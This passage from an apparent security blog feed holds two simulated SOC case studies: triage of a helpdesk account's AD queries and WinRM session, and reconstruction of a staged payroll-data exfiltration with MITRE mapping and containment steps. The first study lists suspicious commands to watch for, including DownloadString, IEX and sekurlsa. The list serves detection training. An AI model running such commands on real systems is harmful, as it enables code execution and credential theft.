<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:24  CLIENT15
4688

wsmprovhost.exe
Parent: svchost.exe
</code></pre></div></div>

<p>and:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:31  CLIENT15
4104

Get-Process
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:16:42  CLIENT15
4104

Get-Service
</code></pre></div></div>

<hr />

<h1 id="1-first-point-of-suspicion">1. First Point of Suspicion</h1>

<h3 id="event">Event:</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>09:14:41
CLIENT14
4104

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>This is the first event that would make me pause and begin active investigation.</p>

<p>The command itself is not malicious. Administrators and helpdesk personnel may legitimately query Active Directory.</p>

<p>However, the <strong>context</strong> increases suspicion.</p>

<p>The sequence was:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk01
     ↓
PowerShell
     ↓
Get-ADComputer -Filter *
     ↓
Get-ADUser -Filter *
     ↓
Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<p>This represents broad Active Directory reconnaissance followed by enumeration of a highly privileged group.</p>

<p>For a SOC analyst, the important distinction is:</p>

<blockquote>
  <p><strong>The command is not inherently malicious; the behaviour and context are what make it suspicious.</strong></p>
</blockquote>

<hr />

<h1 id="2-initial-classification">2. Initial Classification</h1>

<h3 id="classification-suspicious">Classification: SUSPICIOUS</h3>

<p>At this stage, I would classify the activity as <strong>Suspicious</strong>, rather than immediately declaring an incident.</p>

<p>There is not yet enough evidence to demonstrate compromise.</p>

<p>The account is named <strong>HelpDesk01</strong>, which provides a credible legitimate explanation for administrative activity.</p>

<p>A legitimate helpdesk workflow could involve:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HelpDesk01
     ↓
CLIENT14
     ↓
PowerShell
     ↓
Active Directory queries
     ↓
Identify CLIENT15
     ↓
Remote PowerShell session
     ↓
Get-Process
     ↓
Get-Service
</code></pre></div></div>

<p>For example, a helpdesk technician troubleshooting CLIENT15 could legitimately use these commands to identify the computer, inspect its services and investigate a problem.</p>

<p>Therefore, the correct SOC response at this point is:</p>

<p><strong>Investigate further — do not prematurely escalate.</strong></p>

<hr />

<h1 id="3-the-critical-question-could-this-be-legitimate">3. The Critical Question: Could This Be Legitimate?</h1>

<p>Yes.</p>

<p>The presence of:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Enter-PSSession -ComputerName CLIENT15
</code></pre></div></div>

<p>does not automatically establish malicious lateral movement.</p>

<p>Helpdesk personnel commonly use remote administration technologies to troubleshoot endpoints.</p>

<p>The activity could represent:</p>

<ul>
  <li>Troubleshooting a workstation</li>
  <li>Investigating a service failure</li>
  <li>Checking running processes</li>
  <li>Performing software maintenance</li>
  <li>Responding to a user support ticket</li>
</ul>

<p>The key question becomes:</p>

<blockquote>
  <p><strong>Was HelpDesk01 expected to perform this activity from CLIENT14 against CLIENT15 at this time?</strong></p>
</blockquote>

<p>This requires additional context outside the individual security events.</p>

<hr />

<h1 id="4-first-splunk-investigation-pivot">4. First Splunk Investigation Pivot</h1>

<p>My first investigation would establish the complete activity surrounding the suspicious PowerShell enumeration.</p>

<p>A useful initial search would be:</p>

<pre><code class="language-spl">index=wineventlog
(EventCode=4624 OR EventCode=4688 OR EventCode=4104 OR EventCode=4769 OR EventCode=3)
("HelpDesk01" OR "Get-ADGroupMember" OR "CLIENT14")
| sort _time
</code></pre>

<p>This provides a broader view of:</p>

<ul>
  <li>Authentication</li>
  <li>Process creation</li>
  <li>PowerShell activity</li>
  <li>Kerberos activity</li>
  <li>Network communication</li>
</ul>

<p>I would also investigate a wider time window before and after the alert rather than restricting the investigation to the exact events supplied.</p>

<p>For example:</p>

<pre><code class="language-spl">index=wineventlog
earliest=-2h latest=+2h
"HelpDesk01"
| sort _time
</code></pre>

<p>The purpose is to answer:</p>

<blockquote>
  <p><strong>What happened before 09:14 and what happened after 09:16?</strong></p>
</blockquote>

<hr />

<h1 id="5-logonguid-and-processguid-correlation">5. LogonGUID and ProcessGUID Correlation</h1>

<p>Once the relevant authentication event has been identified, I would use available identifiers to correlate activity.</p>

<h3 id="logonguid">LogonGUID</h3>

<p>LogonGUID is useful for answering:</p>

<blockquote>
  <p><strong>Which activity is associated with this authentication session?</strong></p>
</blockquote>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4624
   ↓
LogonGUID
   ↓
subsequent activity
</code></pre></div></div>

<p>This can help establish whether multiple events belong to the same logon context.</p>

<h3 id="processguid">ProcessGUID</h3>

<p>ProcessGUID answers a different question:</p>

<blockquote>
  <p><strong>Which process instance generated or spawned this activity?</strong></p>
</blockquote>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>explorer.exe
      ↓
mmc.exe
      ↓
powershell.exe
      ↓
child process
</code></pre></div></div>

<p>Therefore, I would not rely exclusively on LogonGUID.</p>

<p>I would use:</p>

<p><strong>LogonGUID → authentication/session context</strong></p>

<p>and</p>

<p><strong>ProcessGUID → process execution context</strong></p>

<p>This provides a stronger investigation model.</p>

<hr />

<h1 id="6-client15-is-this-lateral-movement">6. CLIENT15: Is This Lateral Movement?</h1>

<p>At first glance:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT14
    ↓
PowerShell
    ↓
Enter-PSSession
    ↓
CLIENT15
    ↓
4624 Type 3
    ↓
wsmprovhost.exe
    ↓
Get-Process
    ↓
Get-Service
</code></pre></div></div>

<p>looks like lateral movement.</p>

<p>However, I would <strong>not immediately classify it as malicious lateral movement</strong>.</p>

<p>The evidence establishes remote administration, but not attacker intent.</p>

<p>The activity is also technically consistent with legitimate WinRM administration.</p>

<p>The presence of:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wsmprovhost.exe
</code></pre></div></div>

<p>on CLIENT15 is particularly important because it is consistent with a remote PowerShell session being hosted through Windows Remote Management.</p>

<p>Therefore:</p>

<blockquote>
  <p><strong>Remote administration has been established, but malicious lateral movement has not yet been established.</strong></p>
</blockquote>

<p>This distinction is important in a real SOC because incorrectly treating legitimate helpdesk activity as an attack can generate significant false positives.</p>

<hr />

<h1 id="7-evidence-required-before-escalation">7. Evidence Required Before Escalation</h1>

<p>The next stage of the investigation would focus on establishing whether HelpDesk01 was expected to perform this activity.</p>

<h2 id="account-role">Account Role</h2>

<p>I would verify:</p>

<ul>
  <li>Is HelpDesk01 a legitimate helpdesk account?</li>
  <li>Who is assigned to the account?</li>
  <li>What systems is the account normally permitted to administer?</li>
  <li>Does the account normally use CLIENT14?</li>
  <li>Is CLIENT15 within its support scope?</li>
</ul>

<hr />

<h2 id="change-and-ticket-records">Change and Ticket Records</h2>

<p>I would search the helpdesk/ticketing system for:</p>

<ul>
  <li>An active ticket involving CLIENT15</li>
  <li>A troubleshooting request</li>
  <li>A scheduled maintenance activity</li>
  <li>A software deployment</li>
  <li>A service investigation</li>
</ul>

<p>A matching ticket would substantially reduce suspicion.</p>

<hr />

<h2 id="historical-behaviour">Historical Behaviour</h2>

<p>I would compare the current activity with the account’s historical baseline.</p>

<p>Questions include:</p>

<ul>
  <li>Has HelpDesk01 previously logged into CLIENT14?</li>
  <li>Has it previously administered CLIENT15?</li>
  <li>Does it normally use PowerShell?</li>
  <li>Does it normally use WinRM?</li>
  <li>Has it previously queried Domain Admins?</li>
  <li>Is this activity occurring during normal working hours?</li>
</ul>

<p>A sudden deviation from the account’s normal behaviour would increase risk.</p>

<hr />

<h1 id="8-powershell-investigation">8. PowerShell Investigation</h1>

<p>PowerShell 4104 logs should be reviewed on both CLIENT14 and CLIENT15.</p>

<p>I would specifically look for:</p>

<ul>
  <li>Encoded commands</li>
  <li>Obfuscated scripts</li>
  <li>Download activity</li>
  <li>Credential access</li>
  <li>Discovery commands beyond normal troubleshooting</li>
  <li>Persistence mechanisms</li>
  <li>Security-control modification</li>
  <li>External network communication</li>
</ul>

<p>The current commands:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-Process
Get-Service
</code></pre></div></div>

<p>are relatively benign and strongly compatible with troubleshooting.</p>

<p>However, if additional commands appeared such as:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-WebRequest
DownloadString
IEX
Get-Credential
sekurlsa
whoami /all
</code></pre></div></div>

<p>the assessment would change significantly.</p>

<hr />

<h1 id="9-winrm-and-network-investigation">9. WinRM and Network Investigation</h1>

<p>The Sysmon Event ID 3 connection to:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.0.0.10:5985
</code></pre></div></div>

<p>would be investigated to establish whether the destination corresponds to CLIENT15 or another approved management endpoint.</p>

<p>I would verify:</p>

<ul>
  <li>Destination hostname</li>
  <li>Source process</li>
  <li>Connection frequency</li>
  <li>Whether CLIENT14 normally administers CLIENT15</li>
  <li>Other systems contacted by HelpDesk01</li>
  <li>Whether external destinations were contacted</li>
</ul>

<p>A connection to an approved internal management endpoint is considerably less concerning than unexpected external communication.</p>

<hr />

<h1 id="10-what-happened-before-0914">10. What Happened Before 09:14?</h1>

<p>This is one of the most important unanswered questions.</p>

<p>I would investigate the preceding hours for:</p>

<ul>
  <li>Initial logon</li>
  <li>Failed authentication</li>
  <li>Phishing-related activity</li>
  <li>Suspicious process execution</li>
  <li>Malware alerts</li>
  <li>New services</li>
  <li>Scheduled tasks</li>
  <li>Registry persistence</li>
  <li>Downloads</li>
  <li>Browser activity</li>
  <li>Privilege escalation</li>
  <li>Unusual network connections</li>
</ul>

<p>If suspicious activity preceded the HelpDesk session, the likelihood of account compromise would increase significantly.</p>

<hr />

<h1 id="11-what-happened-after-0916">11. What Happened After 09:16?</h1>

<p>I would continue monitoring CLIENT14 and CLIENT15 for:</p>

<ul>
  <li>Credential dumping</li>
  <li>New persistence</li>
  <li>File creation</li>
  <li>Malware execution</li>
  <li>Additional remote sessions</li>
  <li>Lateral movement to other hosts</li>
  <li>External connections</li>
  <li>Data access</li>
  <li>Security-tool tampering</li>
</ul>

<p>The current evidence ends shortly after legitimate-looking troubleshooting commands.</p>

<p>Therefore, the investigation should remain open until sufficient surrounding telemetry has been reviewed.</p>

<hr />

<h1 id="12-current-assessment">12. Current Assessment</h1>

<p>Based solely on the evidence provided:</p>

<h3 id="severity">Severity</h3>

<p><strong>Low–Moderate Suspicion</strong></p>

<h3 id="classification">Classification</h3>

<p><strong>Suspicious — Pending Validation</strong></p>

<h3 id="confidence">Confidence</h3>

<p><strong>Moderate</strong></p>

<h3 id="rationale">Rationale</h3>

<p>The strongest suspicious behaviour is the sequence:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer -Filter *
        ↓
Get-ADUser -Filter *
        ↓
Get-ADGroupMember "Domain Admins"
        ↓
Remote PowerShell
        ↓
CLIENT15
</code></pre></div></div>

<p>However, the account’s helpdesk role provides a credible legitimate explanation.</p>

<p>The remote session also performs:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-Process
Get-Service
</code></pre></div></div>

<p>which are highly consistent with endpoint troubleshooting.</p>

<p>At present, there is insufficient evidence to confidently classify the activity as malicious.</p>

<hr />

<h1 id="13-conditions-that-would-increase-severity">13. Conditions That Would Increase Severity</h1>

<p>I would escalate the investigation if additional telemetry revealed:</p>

<ul>
  <li>HelpDesk01 logging into an unusual workstation</li>
  <li>No corresponding support ticket</li>
  <li>After-hours activity inconsistent with the user’s schedule</li>
  <li>Credential dumping</li>
  <li>Encoded or obfuscated PowerShell</li>
  <li>Malware execution</li>
  <li>Persistence creation</li>
  <li>Access to unrelated sensitive systems</li>
  <li>External command-and-control communication</li>
  <li>Attempts to disable security controls</li>
  <li>Repeated lateral movement</li>
  <li>Access to sensitive data outside the account’s normal responsibilities</li>
</ul>

<p>The investigation would move from:</p>

<p><strong>Suspicious → Confirmed Incident</strong></p>

<p>once evidence demonstrated unauthorized activity or compromise.</p>

<hr />

<h1 id="14-soc-analyst-takeaway">14. SOC Analyst Takeaway</h1>

<p>This investigation reinforced an important principle:</p>

<blockquote>
  <p><strong>Context determines whether an event is suspicious.</strong></p>
</blockquote>

<p>A PowerShell command such as:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-ADComputer -Filter *
</code></pre></div></div>

<p>is not automatically malicious.</p>

<p>Neither is:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Enter-PSSession -ComputerName CLIENT15
</code></pre></div></div>

<p>nor:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-Service
</code></pre></div></div>

<p>But when these events occur together, they create a behavioural pattern that deserves investigation.</p>

<p>At the same time, the presence of a legitimate helpdesk account and a plausible troubleshooting workflow prevents the analyst from prematurely declaring an incident.</p>

<p>The correct SOC approach is therefore:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Detect
   ↓
Investigate
   ↓
Correlate
   ↓
Validate Context
   ↓
Assess Risk
   ↓
Escalate if Evidence Supports It
</code></pre></div></div>

<hr />

<h1 id="skills-demonstrated">Skills Demonstrated</h1>

<p>This investigation strengthened practical skills in:</p>

<ul>
  <li>Splunk event correlation</li>
  <li>Windows Security Event analysis</li>
  <li>PowerShell 4104 investigation</li>
  <li>Sysmon network telemetry</li>
  <li>Process ancestry analysis</li>
  <li>LogonGUID investigation</li>
  <li>ProcessGUID investigation</li>
  <li>Active Directory reconnaissance detection</li>
  <li>WinRM investigation</li>
  <li>Lateral movement analysis</li>
  <li>False-positive reduction</li>
  <li>SOC triage and escalation decisions</li>
</ul>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>The <strong>HelpDesk01</strong> case demonstrates why effective SOC analysis requires more than identifying suspicious commands.</p>

<p>The initial Active Directory enumeration was concerning, but the legitimate role of the account created an alternative explanation. The subsequent WinRM session to CLIENT15 could represent either attacker lateral movement or legitimate remote administration.</p>

<p>Rather than immediately escalating, the appropriate response is to correlate authentication, process, PowerShell, network and historical activity while validating the account’s role and associated support activity.</p>

<p>This investigation reinforced the importance of <strong>behavioural context, historical baselining and evidence-driven escalation</strong> in SOC operations.</p>]]></content><author><name>Precious Cyber6ixxx</name></author><summary type="html"><![CDATA[SOC Investigation Case Study: The HelpDesk Account]]></summary></entry><entry><title type="html">SOC Case Study 01 – The Silent Domain Admin</title><link href="/soc%20case%20studies/2026/07/05/soc-case-study-01-the-silent-domain-admin.html" rel="alternate" type="text/html" title="SOC Case Study 01 – The Silent Domain Admin" /><published>2026-07-05T00:00:00+00:00</published><updated>2026-07-05T00:00:00+00:00</updated><id>/soc%20case%20studies/2026/07/05/soc-case-study-01-the-silent-domain-admin</id><content type="html" xml:base="/soc%20case%20studies/2026/07/05/soc-case-study-01-the-silent-domain-admin.html"><![CDATA[<h1 id="soc-case-study-01--the-silent-domain-admin">SOC Case Study 01 – The Silent Domain Admin</h1>

<h2 id="investigating-active-directory-reconnaissance-lateral-movement-and-suspected-data-exfiltration">Investigating Active Directory Reconnaissance, Lateral Movement, and Suspected Data Exfiltration</h2>

<h2 id="overview">Overview</h2>

<p>This case study documents a simulated Security Operations Center (SOC) investigation in which multiple Windows Security Events, Sysmon logs and PowerShell telemetry were correlated to determine whether suspicious administrator activity represented legitimate administration or an active compromise.</p>

<p>Unlike previous labs that focused on individual Event IDs, this exercise required reconstructing the complete attack timeline, determining when suspicious behaviour became a security incident, assessing impact, mapping activity to the MITRE ATT&amp;CK framework and recommending containment and recovery actions.</p>

<hr />

<h2 id="objectives">Objectives</h2>

<ul>
  <li>Correlate multiple Windows events into one attack story.</li>
  <li>Identify attacker behaviour across multiple hosts.</li>
  <li>Determine the earliest point of suspicion.</li>
  <li>Decide when to declare an incident.</li>
  <li>Scope affected assets and data.</li>
  <li>Recommend containment and recovery actions.</li>
  <li>Map observed behaviour to MITRE ATT&amp;CK.</li>
</ul>

<hr />

<h2 id="lab-environment">Lab Environment</h2>

<table>
  <thead>
    <tr>
      <th>System</th>
      <th>Role</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>CLIENT01</td>
      <td>User Workstation</td>
    </tr>
    <tr>
      <td>CLIENT02</td>
      <td>Suspected Compromised Workstation</td>
    </tr>
    <tr>
      <td>CLIENT03</td>
      <td>User Workstation</td>
    </tr>
    <tr>
      <td>FILESERVER01</td>
      <td>File Server</td>
    </tr>
    <tr>
      <td>DC01</td>
      <td>Domain Controller</td>
    </tr>
  </tbody>
</table>

<hr />

<h1 id="incident-evidence">Incident Evidence</h1>

<p>The following alerts were provided for investigation.</p>

<h3 id="event-1">Event 1</h3>
<p><strong>09:18:02</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT02
Event ID 4624
User: SOCAdmin
Logon Type: 2 (Interactive)
</code></pre></div></div>

<h3 id="event-2">Event 2</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT02
Sysmon Event ID 1

Parent:
explorer.exe

Process:
powershell.exe

Command:
whoami
</code></pre></div></div>

<h3 id="event-3">Event 3</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell 4104
Get-ADDomain
</code></pre></div></div>

<h3 id="event-4">Event 4</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell 4104
Get-ADComputer -Filter *
</code></pre></div></div>

<h3 id="event-5">Event 5</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PowerShell 4104
Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<h3 id="event-6">Event 6</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DC01
Event ID 4769
Service: ldap/DC01
</code></pre></div></div>

<h3 id="event-7">Event 7</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DC01
Event ID 4769
Service: HOST/DC01
</code></pre></div></div>

<h3 id="event-8">Event 8</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT02
Sysmon Event ID 3

powershell.exe

Destination:
192.168.56.10

Port:
389 (LDAP)
</code></pre></div></div>

<h3 id="event-9">Event 9</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT02
Event ID 4688

powershell.exe

net use \\FILESERVER01\Finance
</code></pre></div></div>

<h3 id="event-10">Event 10</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FILESERVER01

4624

SOCAdmin

Logon Type 3

Source:
CLIENT02
</code></pre></div></div>

<h3 id="event-11">Event 11</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FILESERVER01

4663

Payroll2026.xlsx

ReadData
</code></pre></div></div>

<h3 id="event-12">Event 12</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FILESERVER01

4663

Payroll2026.xlsx

WriteData
</code></pre></div></div>

<h3 id="event-13">Event 13</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT02

4688

Compress-Archive Payroll2026.xlsx Payroll.zip
</code></pre></div></div>

<h3 id="event-14">Event 14</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT02

Sysmon Event 3

powershell.exe

172.64.152.44

443
</code></pre></div></div>

<h3 id="event-15">Event 15</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CLIENT02

4688

Remove-Item Payroll.zip
</code></pre></div></div>

<hr />

<h1 id="executive-summary">Executive Summary</h1>

<p>The investigation identified behaviour consistent with a compromised privileged account performing Active Directory reconnaissance, accessing sensitive financial information, preparing data for exfiltration and attempting to remove forensic evidence.</p>

<p>The activity began with PowerShell-based domain enumeration before progressing to lateral access of FILESERVER01, interaction with a payroll spreadsheet, archive creation, suspicious outbound HTTPS communication and deletion of the archive.</p>

<p>Although individual events could be legitimate, the combined sequence strongly indicated malicious activity requiring immediate incident response.</p>

<hr />

<h1 id="timeline-reconstruction">Timeline Reconstruction</h1>

<ol>
  <li>SOCAdmin logged onto CLIENT02 interactively.</li>
  <li>PowerShell was launched and the attacker verified execution context using <strong>whoami</strong>.</li>
  <li>Active Directory reconnaissance was performed using Get-ADDomain, Get-ADComputer and Get-ADGroupMember.</li>
  <li>Kerberos service tickets and LDAP communication confirmed interaction with DC01.</li>
  <li>A connection was established to the Finance share on FILESERVER01.</li>
  <li>Payroll2026.xlsx was read and modified.</li>
  <li>The spreadsheet was archived into Payroll.zip.</li>
  <li>PowerShell established an outbound HTTPS connection to 172.64.152.44.</li>
  <li>Payroll.zip was deleted, suggesting an attempt to remove evidence.</li>
</ol>

<hr />

<h1 id="mitre-attck-mapping">MITRE ATT&amp;CK Mapping</h1>

<table>
  <thead>
    <tr>
      <th>Tactic</th>
      <th>Technique</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Discovery</td>
      <td>Account &amp; Domain Discovery</td>
    </tr>
    <tr>
      <td>Discovery</td>
      <td>Remote System Discovery</td>
    </tr>
    <tr>
      <td>Lateral Movement</td>
      <td>SMB/Windows Admin Shares</td>
    </tr>
    <tr>
      <td>Collection</td>
      <td>Data from Network Share</td>
    </tr>
    <tr>
      <td>Collection</td>
      <td>Archive Collected Data</td>
    </tr>
    <tr>
      <td>Exfiltration</td>
      <td>Exfiltration over Web Services (Suspected)</td>
    </tr>
    <tr>
      <td>Defense Evasion</td>
      <td>File Deletion</td>
    </tr>
  </tbody>
</table>

<hr />

<h1 id="earliest-point-of-suspicion">Earliest Point of Suspicion</h1>

<p>The earliest indicator was the execution of <strong>whoami</strong> immediately after interactive logon.</p>

<p>While legitimate, it became suspicious because it was immediately followed by extensive Active Directory enumeration. Together these actions resembled attacker reconnaissance far more than routine administration.</p>

<hr />

<h1 id="incident-declaration">Incident Declaration</h1>

<p>The activity became a confirmed security incident once Payroll2026.xlsx was accessed on FILESERVER01.</p>

<p>At this stage confidentiality had been impacted and the attack had progressed beyond reconnaissance into unauthorized access of sensitive business data.</p>

<hr />

<h1 id="scope-assessment">Scope Assessment</h1>

<p><strong>Affected Systems</strong></p>

<ul>
  <li>CLIENT02</li>
  <li>FILESERVER01</li>
  <li>DC01</li>
</ul>

<p><strong>Affected Account</strong></p>

<ul>
  <li>SOCAdmin</li>
</ul>

<p><strong>Affected Data</strong></p>

<ul>
  <li>Payroll2026.xlsx</li>
  <li>Finance Share</li>
</ul>

<hr />

<h1 id="additional-telemetry">Additional Telemetry</h1>

<p>Further investigation should include:</p>

<ul>
  <li>PowerShell Script Block Logging (4104) to recover executed commands.</li>
  <li>Sysmon Event ID 1 for parent-child process analysis.</li>
  <li>DNS queries to resolve external infrastructure.</li>
  <li>Firewall/Proxy logs to confirm successful exfiltration.</li>
  <li>Event ID 4672 to identify privileged logons.</li>
  <li>Scheduled Tasks, Services and Registry Run Keys to identify persistence.</li>
  <li>EDR telemetry for additional malicious activity.</li>
</ul>

<hr />

<h1 id="containment">Containment</h1>

<p>Immediate priorities:</p>

<ol>
  <li>Isolate CLIENT02.</li>
  <li>Protect FILESERVER01.</li>
  <li>Disable SOCAdmin pending investigation.</li>
  <li>Revoke Kerberos tickets and active sessions.</li>
  <li>Block outbound communication to the suspicious IP.</li>
  <li>Preserve forensic evidence before remediation.</li>
</ol>

<hr />

<h1 id="recovery">Recovery</h1>

<ul>
  <li>Restore affected files if integrity was compromised.</li>
  <li>Reset privileged credentials.</li>
  <li>Validate payroll data.</li>
  <li>Review privileged workstation policies.</li>
  <li>Perform forensic review of affected hosts.</li>
</ul>

<hr />

<h1 id="lessons-learned">Lessons Learned</h1>

<p>This exercise demonstrated that high-confidence detection depends on correlating authentication events, PowerShell telemetry, file access, archive creation and network activity rather than relying on isolated alerts.</p>

<p>Monitoring privileged account usage, Active Directory reconnaissance and archive creation followed by outbound HTTPS communication can significantly improve early detection.</p>

<hr />

<h1 id="skills-demonstrated">Skills Demonstrated</h1>

<ul>
  <li>Splunk investigation</li>
  <li>Windows Event Log analysis</li>
  <li>Sysmon analysis</li>
  <li>PowerShell investigation</li>
  <li>Active Directory security</li>
  <li>MITRE ATT&amp;CK mapping</li>
  <li>Threat hunting</li>
  <li>Incident response</li>
  <li>Event correlation</li>
</ul>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>This case study simulated the workflow expected of a Tier 1/Tier 2 SOC Analyst. By correlating telemetry from multiple Windows log sources, I reconstructed the attack lifecycle, identified the impact, recommended containment actions and mapped observed behaviour to MITRE ATT&amp;CK.</p>

<p>The exercise reinforced the importance of contextual analysis and event correlation in modern Security Operations Centers.</p>]]></content><author><name>Precious Cyber6ixxx</name></author><category term="SOC Case Studies" /><category term="Splunk" /><category term="SOC" /><category term="Incident Response" /><category term="Active Directory" /><category term="Windows Security" /><category term="MITRE ATT&amp;CK" /><summary type="html"><![CDATA[SOC Case Study 01 – The Silent Domain Admin]]></summary></entry></feed>